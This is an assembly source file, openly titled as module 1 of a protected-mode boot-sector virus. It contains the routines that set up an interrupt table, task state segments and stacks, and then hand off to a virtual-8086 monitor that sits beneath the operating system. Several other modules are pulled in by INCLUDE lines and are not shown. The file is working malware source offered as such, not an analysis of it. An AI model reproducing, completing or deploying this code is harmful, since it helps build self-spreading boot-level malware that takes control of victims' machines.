;Protected mode boot-sector virus - Module 1: Protected Mode Routines

        .386P

INCLUDE PM_DEFS.ASM
INCLUDE DEFS.ASM
INCLUDE PMV2DEFS.ASM

INCLUDE BIOSDATA.ASM

VIRUS   SEGMENT BYTE USE32
        ASSUME  CS:VIRUS,DS:VIRUS,ES:VIRUS,SS:VIRUS

        ORG     100H

START:  ret                             ;dummy ORG 100H address

;*******************************************************************************
; Protected mode routines start here.
;*******************************************************************************
        ORG     7C00H - REAL_SECTORS*512 - PROT_SECTORS*512 - 512*BUF_SIZE - 1000H

IDT             DB      IDT_Entries*8   dup (?)         ;IDT table space

;This is the task state segment for the virtual machine monitor
TSS_1           DB      TSS_Size dup (?)                ;TSS space for task 1 (V86 monitor)


TASK1_STACK:    DB      STACK_SIZE dup (?)              ;stack for task 1
TASK2_STACK0:   DB      STACK_SIZE dup (?)

        ORG     7C00H - REAL_SECTORS*512 - PROT_SECTORS*512 - 512*BUF_SIZE

V86_LOADER:
                mov     ax,DATA_1_SEL                   ;now set up segments
                mov     ds,ax                           ;for protected mode
                mov     es,ax
                mov     fs,ax
                mov     gs,ax
                mov     ss,ax
                mov     esp,OFFSET TASK1_STACK + STACK_SIZE
                xor     eax,eax
                lldt    ax                              ;make sure ldt register is 0

                mov     ax,TSS_1_SEL                    ;init task register
                ltr     ax

                jmp     FWORD PTR [TASK_GATE_2]         ;go to V86 mode

TASK_GATE_2     DD      0
                DW      TSS_2_SEL

INCLUDE HWHNDLR.ASM
INCLUDE NOTIMP.ASM
INCLUDE PMVIDEO.ASM
INCLUDE GPFAULT.ASM

        ORG     7C00H - REAL_SECTORS*512 - 512*BUF_SIZE - 1

        DB      23H

        ENDS    VIRUS

        END     START
